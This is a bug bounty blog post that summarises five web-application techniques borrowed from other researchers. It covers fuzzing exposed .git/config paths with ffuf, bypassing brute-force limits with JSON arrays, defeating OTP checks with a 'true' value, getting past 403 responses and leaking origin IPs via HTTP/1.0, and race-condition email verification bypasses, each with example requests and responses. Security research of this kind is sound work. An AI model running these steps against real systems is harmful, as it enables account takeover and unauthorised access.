Write
OneWriteup
  • Login
  • Register
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
OneWriteup
No Result
View All Result

Top 5 Unique Methods for Bug Bounty Hunters 300 IQ Findings.

rantham by rantham
September 22, 2024
Reading Time: 35 mins read
31
0
Top 5 Unique Methods for Bug Bounty Hunters
Share on FacebookShare on Twitter

Welcome back, people! I’m Rantham, a budding bug bounty hunter. In this blog, I discuss unique and peculiar methods to find vulnerabilities that you’ve probably never come across. Even though these methods are unique, you can apply them to almost every web application.

These methods were discovered by different security researchers. I admire their blogs and have merged all their techniques with simplified explanations for you, the readers. All credit goes to the respective creators. I’ve mentioned their blogs below, so be sure to visit them for detailed explanations. Let’s start the journey!



1. Efficient Way to Find the
.git Directory

Many of us are tired of encountering 404 Not Found or 403 Forbidden error pages while searching for the /.git/config folder. If the target serves multiple countries, they often maintain language-specific servers for each country. For example:

target.com/en for US users

target.com/in for Indian users

Typically, we only search for the .git folder on the language servers we visit. However, a researcher took a different approach by searching for .git on all language servers the target has. This led to finding the folder on the Indian language server:

 

https://target.com/in/.git/config

 

How It Was Done

The researcher used the following ffuf command:

 

ffuf -u http://target.com/FUFF/.git/config -w /wordlist.txt

 

To enhance this method:

Collect language symbols and create a custom wordlist. Alternatively, use the provided language wordlist below.

Language Wordlist: wordlist.txt

Original Blog: A Small URL Fuzzing Made Me $200

Researcher: PraveenArsh0xx0


2. Peculiar Method to Bypass Brute Force Protection

This is my personal favorite! The researcher authored a 13-minute long blog post. I’ll simplify it without losing its essence. This method works only if the login POST request sends JSON values.

Normal Login Request Example:

 

POST /login HTTP/1.1

Host: example.fakewebsite.com

Content-Type: application/json

Content-Length: 34

 

{

  “email”: “fakeuser@gmail.com”,

  “password”: “fakepassword”

}

 

Step-by-Step Bypass

Initial Attempt: Add a list of passwords to the password parameter.

{

  “email”: “fakeuser@gmail.com”,

  “password”: [

    “RileyNoah729”,

    “HarperLiamOlivia”,

    “AnyaKai4782”,

    “NoahHarperLiam”,

    “RileyNoahHarper”,

    “AnyaKaiRileyNoah”,

    “RileyNoahHarper”,

    “AnyaKaiRileyNoah”,

    “RileyNoahHarper”,

    “AnyaKaiRileyNoah”

  ]

}

 

 

 

Result: Throws a 403 Forbidden error.

HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8

 

<html>

<head>

    <title>403 Forbidden</title>

</head>

<body>

    <h1>403 Forbidden</h1>

    <p>Incorrect password. Please try again.</p>

</body>

</html>

Second Attempt: Add a list of emails in the email parameter, placing the correct email in the middle of the list, while keeping the password as is.


{

  “email”: [

    “john.doe@gmail.com”,

    “jane.smith@yahoo.com”,

    “bob.johnson@hotmail.com”,

    “alice.wonderland@outlook.com”,

    “charlie.brown@fakecompany.com”,

    “david.lee@example.com”,

    “emily.davis@test.com”,

    “frank.garcia@domain.com”,

    “fakeuser@gmail.com”,

    “grace.mills@mailinator.com”,

    “henry.rodriguez@email.com”

  ],

  “password”: “fakepassword”

}

Result: Returns 200 OK with JWT tokens.

{

  “status”: “success”,

  “message”: “Login successful”,

  “token”: “eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9…”

}

Why It Works

This brute force method is unique because it doesn’t trigger rate limit protection. By sending only one request to brute force the emails, the researcher successfully bypassed the protection.

Original Blog: How I Was Able to Get Account Takeover from Broken Brute-Force Protection

Researcher: Mohamed Reda


3. OTP Bypass Using Misconfiguration

target.com requires OTP verification for user access. The login request looks like this:

POST /api/v3/userAuthentication HTTP/2

Host: api.com

User-Agent: Mozilla/5.0 …

Content-Type: application/json

Authorization: Bearer 

Content-Length: 66

 

{

  “action”: “verify”,

  “phone”: “1234567890”,

  “otp”: “1111”

}

 

Bypass Technique

Initial Attempts:

The researcher tried various methods using Burp Suite, such as:

Sending the request without the OTP or Removing single quotes.

Result:

None worked; received 403 Forbidden errors.

Successful Bypass:

Replaced the OTP value with ‘true’.

{

  “action”: “verify”,

  “phone”: “1234567890”,

  “otp”: “true”

}

Result: Received a session token in the response.

How to Use This Method

When the application requires OTP verification, simply replace the OTP value with true to check for a bypass.

Original Blog: How I Bypassed OTP in an Unexpected Way

Researcher: DEep



4. 403 Forbidden Bypass

Discovery

The researcher found a new technique to bypass the 403 Forbidden error by exploiting vulnerabilities in HTTP protocol version 1.0.

Normal 403 Forbidden Request:

 

GET /secretfile.svc HTTP/1.1

Host: subdomain1.target.com

User-Agent: curl/7.79.1

Accept: */*

Connection: close

 

Bypass Steps

Change HTTP Version: Modify HTTP/1.1 to HTTP/1.0.

Remove All Headers: Except for the GET method line.

GET /secretfile.svc HTTP/1.0

Why It Works

By removing all headers, including the Host header, improperly configured security mechanisms might treat the request as originating from the same server, thereby bypassing the 403 error.

Additional Uses

Bypass Content Delivery Networks (CDN): Obtain the server’s origin IP.

Applicable on Any Subdomain:
Typical Request:

GET / HTTP/1.1

Host: subdomain2.target.com

User-Agent: curl/7.79.1

Accept: */*

Connection: close

Modified Request:

GET / HTTP/1.0

Response Example:

HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8

Location: https://10.95.251.17/

…

This response reveals the server’s IP address.

Tool Integration

This method has been integrated into Burp Suite tools by PortSwigger. Check it out here.

Original Blog: New Technique 403 Bypass

Researcher: Abbas Heybati


5. Email Verification Bypass

Common Issue

Email verification bypasses often result from server-side misconfigurations. This time, the researcher leveraged a race condition to achieve the bypass.

Steps to Bypass

Create an Account: Register on the target website.

Intercept and Modify Requests in repeater.

First Request: Use an email you don’t have access to.

First Request Example:

{

  “partner_id”: “com.example”,

  “new_email”: “victim@example.com”

}

Second Request: Use your own email address.

Second Request Example:

{

  “partner_id”: “com.example”,

  “new_email”: “myemail@example.com”

}

Send Requests in Parallel:

Create a group tab in Burp Suite.

Add both requests to the group.

Click the down arrow beside the send button and select Send group in parallel.

Outcome

If the target’s security mechanisms are improperly configured, you’ll receive the verification email at your intended email address. After verifying, check the website’s dashboard. The email you don’t have access to will appear as verified.

Original Blog: Email Verification Bypass Using Race Condition

ADVERTISEMENT

Researcher: Spider4


You might already know one or two of the methods mentioned above, but I hope you’ve learned something new in this article to deploy on your bug bounty journey. If possible, I will create a Part Two of this blog. Thanks for reading, guys!

Happy Hunting! 🐛🔍

 

 

 

ADVERTISEMENT
rantham

rantham

Recently Posted

HOW To BECOME AN ETHICAL HACKER ROADMAP

Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

November 15, 2024
705
Top 4 Cyber attacks Commonly used for Hacking Websites!

Top 4 Cyber attacks Commonly used for Hacking Websites!

November 9, 2024
164
How to use bloodhound tool for pentesting

How to use Bloodhound / Sharphound for Pentesting Active Directory?

November 6, 2024
459
Pass The Hash

How to perform Pass The Hash Attack on Active Directory in 2024?

November 2, 2024
147
Load More

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

ADVERTISEMENT

Recommended

Pass The Hash

How to perform Pass The Hash Attack on Active Directory in 2024?

November 2, 2024
147
Flutter application Pentesting

10 Steps to Pentesting a Flutter Application in 2024

October 15, 2024
262

Popular Story

  • Download the Top 100 Free Cybersecurity Courses, Resources, and Study Materials for 2024

    Download the Top 100 Free Cybersecurity Courses, Resources, and Study Materials for 2024

    740 shares
    Share 296 Tweet 185
  • How to use Bloodhound / Sharphound for Pentesting Active Directory?

    83 shares
    Share 33 Tweet 21
  • Termux Top 10 Most Powerful Tools in 2024

    271 shares
    Share 108 Tweet 68
  • Top Cyber Security VAPT Interview Preparation Questions in 2024

    83 shares
    Share 33 Tweet 21
  • Merklemap: The Best Subdomain Search Engine for Comprehensive Online Discovery

    39 shares
    Share 16 Tweet 10
ADVERTISEMENT
OneWriteup

Discover expert cybersecurity articles, tutorials, and the latest trends to protect your digital world.

  • OneWriteup Labs
  • About Us
  • Feedback
  • Contact Us
  • Report
  • Privacy Policy
  • Community Guidelines
  • Terms Of Service

© 2024 OneWriteup

No Result
View All Result
  • Trending
  • Articles
  • News
  • Blog
  • Tutorials
  • Research
  • Top 10 Lists
  • Case Studies
  • Interviews
  • Login
  • Sign Up

© 2024 OneWriteup

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In